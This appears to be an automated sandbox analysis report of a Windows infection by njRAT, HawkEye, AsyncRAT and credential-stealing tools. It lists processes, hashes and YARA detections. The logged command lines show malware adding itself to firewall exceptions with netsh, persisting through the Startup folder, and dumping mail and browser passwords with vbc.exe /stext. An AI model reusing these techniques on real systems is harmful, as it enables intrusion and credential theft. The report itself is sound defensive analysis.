Yara matches:	Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000000.00000003.361826559.000001B866181000.00000004.00000001.sdmp, Author: Joe Security Rule: njrat1, Description: Identify njRat, Source: 00000000.00000003.361826559.000001B866181000.00000004.00000001.sdmp, Author: Brian Wallace @botnet_hunter Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000000.00000003.361022264.000001B86606A000.00000004.00000001.sdmp, Author: Joe Security Rule: njrat1, Description: Identify njRat, Source: 00000000.00000003.361022264.000001B86606A000.00000004.00000001.sdmp, Author: Brian Wallace @botnet_hunter Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000000.00000003.361732058.000001B8660A7000.00000004.00000001.sdmp, Author: Joe Security Rule: njrat1, Description: Identify njRat, Source: 00000000.00000003.361732058.000001B8660A7000.00000004.00000001.sdmp, Author: Brian Wallace @botnet_hunter Rule: SUSP_Double_Base64_Encoded_Executable, Description: Detects an executable that has been encoded with base64 twice, Source: 00000000.00000003.342778002.000001B866BB3000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000000.00000003.363543444.000001B865F71000.00000004.00000001.sdmp, Author: Joe Security Rule: njrat1, Description: Identify njRat, Source: 00000000.00000003.363543444.000001B865F71000.00000004.00000001.sdmp, Author: Brian Wallace @botnet_hunter Rule: Njrat, Description: detect njRAT in memory, Source: 00000000.00000003.363543444.000001B865F71000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: SUSP_Double_Base64_Encoded_Executable, Description: Detects an executable that has been encoded with base64 twice, Source: 00000000.00000002.374043001.000001B866BB2000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000000.00000003.363508087.000001B865F8D000.00000004.00000001.sdmp, Author: Joe Security Rule: njrat1, Description: Identify njRat, Source: 00000000.00000003.363508087.000001B865F8D000.00000004.00000001.sdmp, Author: Brian Wallace @botnet_hunter Rule: Njrat, Description: detect njRAT in memory, Source: 00000000.00000003.363508087.000001B865F8D000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: SUSP_Double_Base64_Encoded_Executable, Description: Detects an executable that has been encoded with base64 twice, Source: 00000000.00000003.341582297.000001B865D3F000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000000.00000003.369408079.000001B867140000.00000004.00000001.sdmp, Author: Joe Security Rule: njrat1, Description: Identify njRat, Source: 00000000.00000003.369408079.000001B867140000.00000004.00000001.sdmp, Author: Brian Wallace @botnet_hunter Rule: Njrat, Description: detect njRAT in memory, Source: 00000000.00000003.369408079.000001B867140000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	high

Chronological Activities

Analysis Process: Tmp.exe PID: 240 Parent PID: 5972

General

Start time:	20:49:45
Start date:	28/04/2021
Path:	C:\Users\user\AppData\Local\Temp\Tmp.exe
Wow64 process (32bit):	false
Commandline:	'C:\Users\user\AppData\Local\Temp\Tmp.exe'
Imagebase:	0x1d0000
File size:	69632 bytes
MD5 hash:	9B30598F8F05C46F8ABB22A4C2ABCC9E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000001.00000000.355914114.00000000001D2000.00000002.00020000.sdmp, Author: Joe Security Rule: njrat1, Description: Identify njRat, Source: 00000001.00000000.355914114.00000000001D2000.00000002.00020000.sdmp, Author: Brian Wallace @botnet_hunter Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000001.00000003.360210292.0000000000696000.00000004.00000001.sdmp, Author: Joe Security Rule: njrat1, Description: Identify njRat, Source: 00000001.00000003.360210292.0000000000696000.00000004.00000001.sdmp, Author: Brian Wallace @botnet_hunter Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000001.00000002.365445146.00000000001D2000.00000002.00020000.sdmp, Author: Joe Security Rule: njrat1, Description: Identify njRat, Source: 00000001.00000002.365445146.00000000001D2000.00000002.00020000.sdmp, Author: Brian Wallace @botnet_hunter Rule: MAL_Winnti_Sample_May18_1, Description: Detects malware sample from Burning Umbrella report - Generic Winnti Rule, Source: C:\Users\user\AppData\Local\Temp\Tmp.exe, Author: Florian Roth Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: C:\Users\user\AppData\Local\Temp\Tmp.exe, Author: Joe Security Rule: njrat1, Description: Identify njRat, Source: C:\Users\user\AppData\Local\Temp\Tmp.exe, Author: Brian Wallace @botnet_hunter
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 78%, Metadefender, Browse Detection: 83%, ReversingLabs
Reputation:	low

Chronological Activities

Analysis Process: pgr.exe PID: 1068 Parent PID: 5972

General

Start time:	20:49:48
Start date:	28/04/2021
Path:	C:\Users\user\AppData\Local\Temp\pgr.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\AppData\Local\Temp\pgr.exe'
Imagebase:	0x80000
File size:	24064 bytes
MD5 hash:	A08F2FAC257ABBBDDDBBD4439F32CFD0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000002.00000002.599254975.0000000000082000.00000002.00020000.sdmp, Author: Joe Security Rule: njrat1, Description: Identify njRat, Source: 00000002.00000002.599254975.0000000000082000.00000002.00020000.sdmp, Author: Brian Wallace @botnet_hunter Rule: Njrat, Description: detect njRAT in memory, Source: 00000002.00000002.599254975.0000000000082000.00000002.00020000.sdmp, Author: JPCERT/CC Incident Response Group Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000002.00000002.608644673.00000000028C1000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000002.00000002.608644673.00000000028C1000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000002.00000002.608644673.00000000028C1000.00000004.00000001.sdmp, Author: Joe Security Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000002.00000002.608644673.00000000028C1000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000002.00000002.611403829.00000000039DF000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000002.00000002.611403829.00000000039DF000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000002.00000002.611403829.00000000039DF000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000002.00000002.611403829.00000000039DF000.00000004.00000001.sdmp, Author: Joe Security Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000002.00000002.611403829.00000000039DF000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000002.00000000.360863456.0000000000082000.00000002.00020000.sdmp, Author: Joe Security Rule: njrat1, Description: Identify njRat, Source: 00000002.00000000.360863456.0000000000082000.00000002.00020000.sdmp, Author: Brian Wallace @botnet_hunter Rule: Njrat, Description: detect njRAT in memory, Source: 00000002.00000000.360863456.0000000000082000.00000002.00020000.sdmp, Author: JPCERT/CC Incident Response Group Rule: CN_disclosed_20180208_c, Description: Detects malware from disclosed CN malware set, Source: C:\Users\user\AppData\Local\Temp\pgr.exe, Author: Florian Roth Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: C:\Users\user\AppData\Local\Temp\pgr.exe, Author: Joe Security Rule: njrat1, Description: Identify njRat, Source: C:\Users\user\AppData\Local\Temp\pgr.exe, Author: Brian Wallace @botnet_hunter Rule: Njrat, Description: detect njRAT in memory, Source: C:\Users\user\AppData\Local\Temp\pgr.exe, Author: JPCERT/CC Incident Response Group
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 91%, Metadefender, Browse Detection: 91%, ReversingLabs
Reputation:	low

Chronological Activities

Analysis Process: servieda.exe PID: 5648 Parent PID: 240

General

Start time:	20:49:49
Start date:	28/04/2021
Path:	C:\Users\user\AppData\Roaming\servieda.exe
Wow64 process (32bit):	false
Commandline:	'C:\Users\user\AppData\Roaming\servieda.exe'
Imagebase:	0xa0000
File size:	69632 bytes
MD5 hash:	9B30598F8F05C46F8ABB22A4C2ABCC9E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000003.00000003.375381174.00000000006AD000.00000004.00000001.sdmp, Author: Joe Security Rule: njrat1, Description: Identify njRat, Source: 00000003.00000003.375381174.00000000006AD000.00000004.00000001.sdmp, Author: Brian Wallace @botnet_hunter Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000003.00000003.434132652.00000000006AD000.00000004.00000001.sdmp, Author: Joe Security Rule: njrat1, Description: Identify njRat, Source: 00000003.00000003.434132652.00000000006AD000.00000004.00000001.sdmp, Author: Brian Wallace @botnet_hunter Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000003.00000003.386399141.00000000006AD000.00000004.00000001.sdmp, Author: Joe Security Rule: njrat1, Description: Identify njRat, Source: 00000003.00000003.386399141.00000000006AD000.00000004.00000001.sdmp, Author: Brian Wallace @botnet_hunter Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000003.00000003.418513533.00000000006AD000.00000004.00000001.sdmp, Author: Joe Security Rule: njrat1, Description: Identify njRat, Source: 00000003.00000003.418513533.00000000006AD000.00000004.00000001.sdmp, Author: Brian Wallace @botnet_hunter Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000003.00000000.364575966.00000000000A2000.00000002.00020000.sdmp, Author: Joe Security Rule: njrat1, Description: Identify njRat, Source: 00000003.00000000.364575966.00000000000A2000.00000002.00020000.sdmp, Author: Brian Wallace @botnet_hunter Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000003.00000002.599389764.00000000000A2000.00000002.00020000.sdmp, Author: Joe Security Rule: njrat1, Description: Identify njRat, Source: 00000003.00000002.599389764.00000000000A2000.00000002.00020000.sdmp, Author: Brian Wallace @botnet_hunter Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000003.00000003.431917812.00000000006AD000.00000004.00000001.sdmp, Author: Joe Security Rule: njrat1, Description: Identify njRat, Source: 00000003.00000003.431917812.00000000006AD000.00000004.00000001.sdmp, Author: Brian Wallace @botnet_hunter Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000003.00000003.404397604.00000000006AD000.00000004.00000001.sdmp, Author: Joe Security Rule: njrat1, Description: Identify njRat, Source: 00000003.00000003.404397604.00000000006AD000.00000004.00000001.sdmp, Author: Brian Wallace @botnet_hunter Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000003.00000003.416270861.00000000006AD000.00000004.00000001.sdmp, Author: Joe Security Rule: njrat1, Description: Identify njRat, Source: 00000003.00000003.416270861.00000000006AD000.00000004.00000001.sdmp, Author: Brian Wallace @botnet_hunter Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000003.00000003.407415597.00000000006AD000.00000004.00000001.sdmp, Author: Joe Security Rule: njrat1, Description: Identify njRat, Source: 00000003.00000003.407415597.00000000006AD000.00000004.00000001.sdmp, Author: Brian Wallace @botnet_hunter Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000003.00000003.379800367.00000000006AD000.00000004.00000001.sdmp, Author: Joe Security Rule: njrat1, Description: Identify njRat, Source: 00000003.00000003.379800367.00000000006AD000.00000004.00000001.sdmp, Author: Brian Wallace @botnet_hunter Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000003.00000003.409647935.00000000006AD000.00000004.00000001.sdmp, Author: Joe Security Rule: njrat1, Description: Identify njRat, Source: 00000003.00000003.409647935.00000000006AD000.00000004.00000001.sdmp, Author: Brian Wallace @botnet_hunter Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000003.00000003.429703452.00000000006AD000.00000004.00000001.sdmp, Author: Joe Security Rule: njrat1, Description: Identify njRat, Source: 00000003.00000003.429703452.00000000006AD000.00000004.00000001.sdmp, Author: Brian Wallace @botnet_hunter Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000003.00000003.384190622.00000000006AD000.00000004.00000001.sdmp, Author: Joe Security Rule: njrat1, Description: Identify njRat, Source: 00000003.00000003.384190622.00000000006AD000.00000004.00000001.sdmp, Author: Brian Wallace @botnet_hunter Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000003.00000003.420692346.00000000006AD000.00000004.00000001.sdmp, Author: Joe Security Rule: njrat1, Description: Identify njRat, Source: 00000003.00000003.420692346.00000000006AD000.00000004.00000001.sdmp, Author: Brian Wallace @botnet_hunter Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000003.00000002.600750205.00000000006AA000.00000004.00000020.sdmp, Author: Joe Security Rule: njrat1, Description: Identify njRat, Source: 00000003.00000002.600750205.00000000006AA000.00000004.00000020.sdmp, Author: Brian Wallace @botnet_hunter Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000003.00000003.422988044.00000000006AD000.00000004.00000001.sdmp, Author: Joe Security Rule: njrat1, Description: Identify njRat, Source: 00000003.00000003.422988044.00000000006AD000.00000004.00000001.sdmp, Author: Brian Wallace @botnet_hunter Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000003.00000003.397417022.00000000006AD000.00000004.00000001.sdmp, Author: Joe Security Rule: njrat1, Description: Identify njRat, Source: 00000003.00000003.397417022.00000000006AD000.00000004.00000001.sdmp, Author: Brian Wallace @botnet_hunter Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000003.00000003.388634565.00000000006AD000.00000004.00000001.sdmp, Author: Joe Security Rule: njrat1, Description: Identify njRat, Source: 00000003.00000003.388634565.00000000006AD000.00000004.00000001.sdmp, Author: Brian Wallace @botnet_hunter Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000003.00000003.381975904.00000000006AD000.00000004.00000001.sdmp, Author: Joe Security Rule: njrat1, Description: Identify njRat, Source: 00000003.00000003.381975904.00000000006AD000.00000004.00000001.sdmp, Author: Brian Wallace @botnet_hunter Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000003.00000003.390816638.00000000006AD000.00000004.00000001.sdmp, Author: Joe Security Rule: njrat1, Description: Identify njRat, Source: 00000003.00000003.390816638.00000000006AD000.00000004.00000001.sdmp, Author: Brian Wallace @botnet_hunter Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000003.00000003.414035813.00000000006AD000.00000004.00000001.sdmp, Author: Joe Security Rule: njrat1, Description: Identify njRat, Source: 00000003.00000003.414035813.00000000006AD000.00000004.00000001.sdmp, Author: Brian Wallace @botnet_hunter Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000003.00000003.399625080.00000000006AD000.00000004.00000001.sdmp, Author: Joe Security Rule: njrat1, Description: Identify njRat, Source: 00000003.00000003.399625080.00000000006AD000.00000004.00000001.sdmp, Author: Brian Wallace @botnet_hunter Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000003.00000003.425183434.00000000006AD000.00000004.00000001.sdmp, Author: Joe Security Rule: njrat1, Description: Identify njRat, Source: 00000003.00000003.425183434.00000000006AD000.00000004.00000001.sdmp, Author: Brian Wallace @botnet_hunter Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000003.00000003.377587214.00000000006AD000.00000004.00000001.sdmp, Author: Joe Security Rule: njrat1, Description: Identify njRat, Source: 00000003.00000003.377587214.00000000006AD000.00000004.00000001.sdmp, Author: Brian Wallace @botnet_hunter Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000003.00000003.411854151.00000000006AD000.00000004.00000001.sdmp, Author: Joe Security Rule: njrat1, Description: Identify njRat, Source: 00000003.00000003.411854151.00000000006AD000.00000004.00000001.sdmp, Author: Brian Wallace @botnet_hunter Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000003.00000003.519777905.00000000006B0000.00000004.00000001.sdmp, Author: Joe Security Rule: njrat1, Description: Identify njRat, Source: 00000003.00000003.519777905.00000000006B0000.00000004.00000001.sdmp, Author: Brian Wallace @botnet_hunter Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000003.00000003.427394879.00000000006AD000.00000004.00000001.sdmp, Author: Joe Security Rule: njrat1, Description: Identify njRat, Source: 00000003.00000003.427394879.00000000006AD000.00000004.00000001.sdmp, Author: Brian Wallace @botnet_hunter Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000003.00000003.401942814.00000000006AD000.00000004.00000001.sdmp, Author: Joe Security Rule: njrat1, Description: Identify njRat, Source: 00000003.00000003.401942814.00000000006AD000.00000004.00000001.sdmp, Author: Brian Wallace @botnet_hunter Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000003.00000003.436364231.00000000006AD000.00000004.00000001.sdmp, Author: Joe Security Rule: njrat1, Description: Identify njRat, Source: 00000003.00000003.436364231.00000000006AD000.00000004.00000001.sdmp, Author: Brian Wallace @botnet_hunter Rule: MAL_Winnti_Sample_May18_1, Description: Detects malware sample from Burning Umbrella report - Generic Winnti Rule, Source: C:\Users\user\AppData\Roaming\servieda.exe, Author: Florian Roth Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: C:\Users\user\AppData\Roaming\servieda.exe, Author: Joe Security Rule: njrat1, Description: Identify njRat, Source: C:\Users\user\AppData\Roaming\servieda.exe, Author: Brian Wallace @botnet_hunter
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 78%, Metadefender, Browse Detection: 83%, ReversingLabs
Reputation:	low

Chronological Activities

Analysis Process: netsh.exe PID: 4592 Parent PID: 5648

General

Start time:	20:49:52
Start date:	28/04/2021
Path:	C:\Windows\System32\netsh.exe
Wow64 process (32bit):	false
Commandline:	netsh firewall add allowedprogram 'C:\Users\user\AppData\Roaming\servieda.exe' 'servieda.exe' ENABLE
Imagebase:	0x7ff695dc0000
File size:	92672 bytes
MD5 hash:	98CC37BBF363A38834253E22C80A8F32
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: conhost.exe PID: 4860 Parent PID: 4592

General

Start time:	20:49:52
Start date:	28/04/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff61de10000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: netsh.exe PID: 5596 Parent PID: 1068

General

Start time:	20:49:55
Start date:	28/04/2021
Path:	C:\Windows\SysWOW64\netsh.exe
Wow64 process (32bit):	true
Commandline:	netsh firewall add allowedprogram 'C:\Users\user\AppData\Local\Temp\pgr.exe' 'pgr.exe' ENABLE
Imagebase:	0x9e0000
File size:	82944 bytes
MD5 hash:	A0AA3322BB46BBFC36AB9DC1DBBBB807
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 956 Parent PID: 5596

General

Start time:	20:49:56
Start date:	28/04/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff61de10000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: d4c6a6df7bab3dad31763de990c4ed82.exe PID: 2244 Parent PID: 3440

General

Start time:	20:50:02
Start date:	28/04/2021
Path:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d4c6a6df7bab3dad31763de990c4ed82.exe
Wow64 process (32bit):	false
Commandline:	'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d4c6a6df7bab3dad31763de990c4ed82.exe'
Imagebase:	0xa70000
File size:	69632 bytes
MD5 hash:	9B30598F8F05C46F8ABB22A4C2ABCC9E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000008.00000000.392012717.0000000000A72000.00000002.00020000.sdmp, Author: Joe Security Rule: njrat1, Description: Identify njRat, Source: 00000008.00000000.392012717.0000000000A72000.00000002.00020000.sdmp, Author: Brian Wallace @botnet_hunter Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000008.00000002.395800979.0000000000A72000.00000002.00020000.sdmp, Author: Joe Security Rule: njrat1, Description: Identify njRat, Source: 00000008.00000002.395800979.0000000000A72000.00000002.00020000.sdmp, Author: Brian Wallace @botnet_hunter Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d4c6a6df7bab3dad31763de990c4ed82.exe, Author: Joe Security Rule: njrat1, Description: Identify njRat, Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d4c6a6df7bab3dad31763de990c4ed82.exe, Author: Brian Wallace @botnet_hunter
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML
Reputation:	low

Chronological Activities

Analysis Process: tmp87E4.tmp.exe PID: 5036 Parent PID: 1068

General

Start time:	20:50:20
Start date:	28/04/2021
Path:	C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe'
Imagebase:	0x6e0000
File size:	48640 bytes
MD5 hash:	6107D33B54A998C142311E55B3EC53D2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 0000000C.00000000.429733559.00000000006E2000.00000002.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 0000000C.00000002.599252774.00000000006E2000.00000002.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 0000000C.00000002.601243946.0000000002AF1000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML
Reputation:	low

Chronological Activities

Analysis Process: tmpFB21.tmp.exe PID: 4928 Parent PID: 1068

General

Start time:	20:50:48
Start date:	28/04/2021
Path:	C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe'
Imagebase:	0x8a0000
File size:	532992 bytes
MD5 hash:	5C0E9E0C72288F8B70BB68C0036ECB52
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 0000000D.00000002.611737671.0000000004021000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 0000000D.00000002.611737671.0000000004021000.00000004.00000001.sdmp, Author: Joe Security Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 0000000D.00000002.599349965.00000000008A2000.00000002.00020000.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 0000000D.00000002.599349965.00000000008A2000.00000002.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 0000000D.00000002.599349965.00000000008A2000.00000002.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 0000000D.00000002.599349965.00000000008A2000.00000002.00020000.sdmp, Author: Joe Security Rule: Hawkeye, Description: detect HawkEye in memory, Source: 0000000D.00000002.599349965.00000000008A2000.00000002.00020000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 0000000D.00000002.609034784.0000000003021000.00000004.00000001.sdmp, Author: Joe Security Rule: Hawkeye, Description: detect HawkEye in memory, Source: 0000000D.00000002.609034784.0000000003021000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 0000000D.00000000.490757263.00000000008A2000.00000002.00020000.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 0000000D.00000000.490757263.00000000008A2000.00000002.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 0000000D.00000000.490757263.00000000008A2000.00000002.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 0000000D.00000000.490757263.00000000008A2000.00000002.00020000.sdmp, Author: Joe Security Rule: Hawkeye, Description: detect HawkEye in memory, Source: 0000000D.00000000.490757263.00000000008A2000.00000002.00020000.sdmp, Author: JPCERT/CC Incident Response Group Rule: HKTL_NET_GUID_Stealer, Description: Detects c# red/black-team tools via typelibguid, Source: 0000000D.00000002.616200946.0000000008100000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: HKTL_NET_GUID_Stealer, Description: Detects c# red/black-team tools via typelibguid, Source: 0000000D.00000002.616252308.0000000008150000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe, Author: Kevin Breen <kevin@techanarchy.net> Rule: HKTL_NET_GUID_Stealer, Description: Detects c# red/black-team tools via typelibguid, Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe, Author: Arnim Rupp Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe, Author: Joe Security Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe, Author: Joe Security Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe, Author: Joe Security Rule: Hawkeye, Description: detect HawkEye in memory, Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe, Author: JPCERT/CC Incident Response Group
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Avira Detection: 100%, Joe Sandbox ML
Reputation:	low

Chronological Activities

Analysis Process: vbc.exe PID: 1428 Parent PID: 4928

General

Start time:	20:50:58
Start date:	28/04/2021
Path:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holdermail.txt'
Imagebase:	0x400000
File size:	1171592 bytes
MD5 hash:	C63ED21D5706A527419C9FBD730FFB2E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 0000000E.00000002.513995957.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: vbc.exe PID: 5824 Parent PID: 4928

General

Start time:	20:50:59
Start date:	28/04/2021
Path:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holderwb.txt'
Imagebase:	0x400000
File size:	1171592 bytes
MD5 hash:	C63ED21D5706A527419C9FBD730FFB2E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 0000000F.00000002.518251485.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: Tmp.exe PID: 240 Parent PID: 5972 Tmp.exeCOMMON

Executed Functions

Function 00007FFD067D0ADD, Relevance: 4.2, Strings: 1, Instructions: 3000COMMON

Download Yara Rule

Strings

PC6e, xrefs: 00007FFD067D1434

Memory Dump Source

